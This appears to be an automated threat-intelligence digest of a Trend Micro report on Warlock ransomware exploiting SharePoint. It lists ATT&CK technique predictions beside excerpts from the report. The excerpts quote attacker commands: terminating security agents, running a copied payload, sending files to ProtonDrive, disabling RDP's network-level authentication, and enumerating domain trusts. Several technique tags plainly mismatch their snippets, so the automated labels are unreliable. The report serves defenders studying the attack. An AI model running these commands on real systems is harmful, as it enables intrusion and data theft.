TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Trend Micro Research

Warlock: From SharePoint Vulnerability Exploit to Enterprise Ransomware

Armando Nathaniel Pedragoza · 2025-08-20 · Read original ↗

ATT&CK techniques detected

47 predictions
T1486Data Encrypted for Impact
100%
“by setting the fdenytsconnections value at hklm \ system \ currentcontrolset \ control \ terminal server to 0. the system ’ s security posture is further weakened by disabling network level authentication ( nla ) through the userauthentication value at hklm \ system \ currentcont…”
T1486Data Encrypted for Impact
100%
“the dropping of a ransom note and the presence of encrypted files. both cases illustrate lockbit 3. 0 ' s continued use of dll sideloading through legitimate executables to evade detection and achieve execution within compromised systems. we identified another infection containin…”
T1190Exploit Public-Facing Application
99%
“end - to - end attack highlights the dangers of delayed patching and the importance of layered defense. trend vision one™ detects warlock iocs and equips customers with tailored threat hunting queries, insights, and intelligence updates. introduction organizations continue to gra…”
T1486Data Encrypted for Impact
98%
“and warlock in the same attack chains against sharepoint environments, using dll sideloading via legitimate utilities like 7zip. this suggests warlock was constructed using the same builder framework that was made public in 2022, highlighting how a single leak enabled the prolife…”
T1069.001Local Groups
97%
“administrator group from exploited sharepoint server parentcmd : ( w3wp. exe and - ap and sharepoint ) and objectcmd : localgroup administrators * / add more hunting queries are available for trend vision one customers with threat insights entitlement enabled. indicators of compr…”
T1486Data Encrypted for Impact
97%
“trendsecurity [. ] exe copy \ \ { unc path } \ mydrive : / client _ 42 - - protondrive - username [ email ] - - protondrive - password [ password ] - p - - include " *. { txt, pdf, csv, accdb, doc, docx, xlsx, mdf, sql, doc, xls, sql, jpg, png, jpeg, sqlite, db, sqlite3, sdf, ndf…”
T1486Data Encrypted for Impact
96%
“in countries such as portugal, croatia, and turkey. other victims included organizations from the financial services and manufacturing sectors. warlock also seems to have potential ties to black basta, a prolific ransomware group that stopped publishing victims in early 2025. whi…”
T1003.002Security Account Manager
92%
“includes remote administrative shares, to map available files and storage locations across the environment. this is performed using the following command : - cmd / c dir < path > account discovery to identify privileged and user accounts, along with active user sessions, the atta…”
T1059.001PowerShell
87%
“evasion and enables the attackers to maintain persistence. our analysis indicates that the primary victims belong to the finance and electronics industries within the asia, middle east, and africa ( amea ) region. cve - 2023 - 27532 despite the vulnerability already being previou…”
T1679Selective Exclusion
87%
“and warlock in the same attack chains against sharepoint environments, using dll sideloading via legitimate utilities like 7zip. this suggests warlock was constructed using the same builder framework that was made public in 2022, highlighting how a single leak enabled the prolife…”
T1021.002SMB/Windows Admin Shares
84%
“temporary dump files on affected systems. these files are frequently created during the dumping process and may be associated with commands executed via processes like c : \ windows \ system32 \ svchost. exe - k localservice. lateral movement server message block / windows admini…”
T1482Domain Trust Discovery
84%
“7. 0 / cloudflared - windows - amd64. exe the attacker subsequently performs domain trust enumeration using the windows utility tool nltest to discover trust relationships between active directory domains. nltest / domain _ trusts system information collection the threat actor pr…”
T1484.001Group Policy Modification
81%
“sequence of post - exploitation techniques leading to ransomware deployment and data exfiltration. initial access exploitation of internet - facing on - premise microsoft sharepoint server the attack begins with exploitation of microsoft sharepoint vulnerabilities, allowing the t…”
T1055.001Dynamic-link Library Injection
79%
“\ vmtools. exe 2 > nul | | exit " timeout / t 5 taskkill / f / im tm _ netagent. exe taskkill / f / im voneagentconsoletray cmd / c copy \ { ip address } \ { domain name } \ * % public % \ / y start / b cmd / c " % public % \ { domain name }. exe 2 > nul | | exit " start / b cmd …”
T1080Taint Shared Content
75%
“the dropping of a ransom note and the presence of encrypted files. both cases illustrate lockbit 3. 0 ' s continued use of dll sideloading through legitimate executables to evade detection and achieve execution within compromised systems. we identified another infection containin…”
T1482Domain Trust Discovery
72%
“using the previously installed malicious driver. attempts to terminate trend processes or services are automatically blocked and logged by our self - protection technology. this activity is promptly reported to the management console, ensuring administrators are alerted to potent…”
T1486Data Encrypted for Impact
71%
“can weaponize enterprise vulnerabilities for high - impact extortion activities. through the exploitation of the sharepoint vulnerabilities, attackers were able to bypass authentication, achieve remote code execution ( rce ), and rapidly pivot across compromised networks. in this…”
T1080Taint Shared Content
70%
“by setting the fdenytsconnections value at hklm \ system \ currentcontrolset \ control \ terminal server to 0. the system ’ s security posture is further weakened by disabling network level authentication ( nla ) through the userauthentication value at hklm \ system \ currentcont…”
T1003.001LSASS Memory
70%
“includes remote administrative shares, to map available files and storage locations across the environment. this is performed using the following command : - cmd / c dir < path > account discovery to identify privileged and user accounts, along with active user sessions, the atta…”
T1021.002SMB/Windows Admin Shares
69%
“) first establishes a network connection to a remote file share using hardcoded credentials. it then systematically copies files such as vmtools. exe and log. bat ( renamed to log. txt ), as well as the files from the remote share \ { ip address } \ { domain name } \ — including …”
T1003OS Credential Dumping
69%
“evasion and enables the attackers to maintain persistence. our analysis indicates that the primary victims belong to the finance and electronics industries within the asia, middle east, and africa ( amea ) region. cve - 2023 - 27532 despite the vulnerability already being previou…”
T1080Taint Shared Content
66%
“trendsecurity [. ] exe copy \ \ { unc path } \ mydrive : / client _ 42 - - protondrive - username [ email ] - - protondrive - password [ password ] - p - - include " *. { txt, pdf, csv, accdb, doc, docx, xlsx, mdf, sql, doc, xls, sql, jpg, png, jpeg, sqlite, db, sqlite3, sdf, ndf…”
T1574.001DLL
65%
“loading technique, where it loads the malicious mpclient. dll file. in the incident we analyzed, mpclient. dll itself was the lockbit 3. 0 ransomware payload, which was directly executed by the mpcmdrun. exe tool. this method was also previously seen in lockbit 3. 0 campaigns tha…”
T1190Exploit Public-Facing Application
64%
“warlock : from sharepoint vulnerability exploit to enterprise ransomware ransomware warlock : from sharepoint vulnerability exploit to enterprise ransomware warlock ransomware exploits unpatched microsoft sharepoint vulnerabilities to gain access, escalate privileges, steal crede…”
T1486Data Encrypted for Impact
61%
“loading technique, where it loads the malicious mpclient. dll file. in the incident we analyzed, mpclient. dll itself was the lockbit 3. 0 ransomware payload, which was directly executed by the mpcmdrun. exe tool. this method was also previously seen in lockbit 3. 0 campaigns tha…”
T1489Service Stop
60%
“##lav. i the attacker deploys a binary named vmtools. exe ( identified as trojan. win64. killlav. i ) to enumerate running processes and terminate those specified in the log. txt file. all the targeted processes are associated with trend security products. it drops an encrypted d…”
T1486Data Encrypted for Impact
57%
“warlock : from sharepoint vulnerability exploit to enterprise ransomware ransomware warlock : from sharepoint vulnerability exploit to enterprise ransomware warlock ransomware exploits unpatched microsoft sharepoint vulnerabilities to gain access, escalate privileges, steal crede…”
T1679Selective Exclusion
55%
“by setting the fdenytsconnections value at hklm \ system \ currentcontrolset \ control \ terminal server to 0. the system ’ s security posture is further weakened by disabling network level authentication ( nla ) through the userauthentication value at hklm \ system \ currentcont…”
T1003OS Credential Dumping
50%
“to extract stored credentials from the veeam database. disk overwriting with writenull. exe the writenull. exe utility fills the disk with null bytes to overwrite free space, preventing file recovery and complicating forensic analysis. attackers, including ransomware operators, m…”
T1585.002Email Accounts
49%
“trendsecurity [. ] exe copy \ \ { unc path } \ mydrive : / client _ 42 - - protondrive - username [ email ] - - protondrive - password [ password ] - p - - include " *. { txt, pdf, csv, accdb, doc, docx, xlsx, mdf, sql, doc, xls, sql, jpg, png, jpeg, sqlite, db, sqlite3, sdf, ndf…”
T1552.001Credentials In Files
48%
“to extract stored credentials from the veeam database. disk overwriting with writenull. exe the writenull. exe utility fills the disk with null bytes to overwrite free space, preventing file recovery and complicating forensic analysis. attackers, including ransomware operators, m…”
T1505.004IIS Components
48%
“\ vmtools. exe 2 > nul | | exit " timeout / t 5 taskkill / f / im tm _ netagent. exe taskkill / f / im voneagentconsoletray cmd / c copy \ { ip address } \ { domain name } \ * % public % \ / y start / b cmd / c " % public % \ { domain name }. exe 2 > nul | | exit " start / b cmd …”
T1053.005Scheduled Task
48%
“\ vmtools. exe 2 > nul | | exit " timeout / t 5 taskkill / f / im tm _ netagent. exe taskkill / f / im voneagentconsoletray cmd / c copy \ { ip address } \ { domain name } \ * % public % \ / y start / b cmd / c " % public % \ { domain name }. exe 2 > nul | | exit " start / b cmd …”
T1059.001PowerShell
47%
“using the previously installed malicious driver. attempts to terminate trend processes or services are automatically blocked and logged by our self - protection technology. this activity is promptly reported to the management console, ensuring administrators are alerted to potent…”
T1003.001LSASS Memory
47%
“to extract stored credentials from the veeam database. disk overwriting with writenull. exe the writenull. exe utility fills the disk with null bytes to overwrite free space, preventing file recovery and complicating forensic analysis. attackers, including ransomware operators, m…”
T1048.002Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
43%
“##01 - 2k16 cj - dc01 - 2k16 cj - dc02 - dr - 2k16 command - and - control server the attacker sets up a stealthy command - and - control ( c & c ) channel inside the compromised environment. in this specific incident, protocol tunneling was implemented using a cloudflare binary …”
T1098Account Manipulation
39%
“sequence of post - exploitation techniques leading to ransomware deployment and data exfiltration. initial access exploitation of internet - facing on - premise microsoft sharepoint server the attack begins with exploitation of microsoft sharepoint vulnerabilities, allowing the t…”
T1105Ingress Tool Transfer
39%
“" - a \ \. \ pipe \ iisipm4f1f605b - 0c8e - 4499 - 89cb - 98c2c98832ad - h " c : \ inetpub \ temp \ apppools \ sharepoint - 80 \ sharepoint - 80 [. ] config " - w " " - m 0 the attack sequence continues with the drop and execution of cloudflare. bat in c : \ programdata \, which …”
T1486Data Encrypted for Impact
37%
“to extract stored credentials from the veeam database. disk overwriting with writenull. exe the writenull. exe utility fills the disk with null bytes to overwrite free space, preventing file recovery and complicating forensic analysis. attackers, including ransomware operators, m…”
T1570Lateral Tool Transfer
35%
“temporary dump files on affected systems. these files are frequently created during the dumping process and may be associated with commands executed via processes like c : \ windows \ system32 \ svchost. exe - k localservice. lateral movement server message block / windows admini…”
T1003.004LSA Secrets
33%
“includes remote administrative shares, to map available files and storage locations across the environment. this is performed using the following command : - cmd / c dir < path > account discovery to identify privileged and user accounts, along with active user sessions, the atta…”
T1055.001Dynamic-link Library Injection
33%
“loading technique, where it loads the malicious mpclient. dll file. in the incident we analyzed, mpclient. dll itself was the lockbit 3. 0 ransomware payload, which was directly executed by the mpcmdrun. exe tool. this method was also previously seen in lockbit 3. 0 campaigns tha…”
T1588.001Malware
32%
“in countries such as portugal, croatia, and turkey. other victims included organizations from the financial services and manufacturing sectors. warlock also seems to have potential ties to black basta, a prolific ransomware group that stopped publishing victims in early 2025. whi…”
T1543.003Windows Service
32%
“##lav. i the attacker deploys a binary named vmtools. exe ( identified as trojan. win64. killlav. i ) to enumerate running processes and terminate those specified in the log. txt file. all the targeted processes are associated with trend security products. it drops an encrypted d…”
T1486Data Encrypted for Impact
32%
“. to defend against warlock ransomware and similar threats, organizations should promptly patch their on - premises sharepoint servers. in addition to microsoft ’ s security updates, trend has released targeted updates, proactive detection rules, and network filters that can help…”
T1080Taint Shared Content
32%
“) first establishes a network connection to a remote file share using hardcoded credentials. it then systematically copies files such as vmtools. exe and log. bat ( renamed to log. txt ), as well as the files from the remote share \ { ip address } \ { domain name } \ — including …”
T1190Exploit Public-Facing Application
32%
“. to defend against warlock ransomware and similar threats, organizations should promptly patch their on - premises sharepoint servers. in addition to microsoft ’ s security updates, trend has released targeted updates, proactive detection rules, and network filters that can help…”

Summary

Warlock ransomware exploits unpatched Microsoft SharePoint vulnerabilities to gain access, escalate privileges, steal credentials, move laterally, and deploy ransomware with data exfiltration across enterprise environments.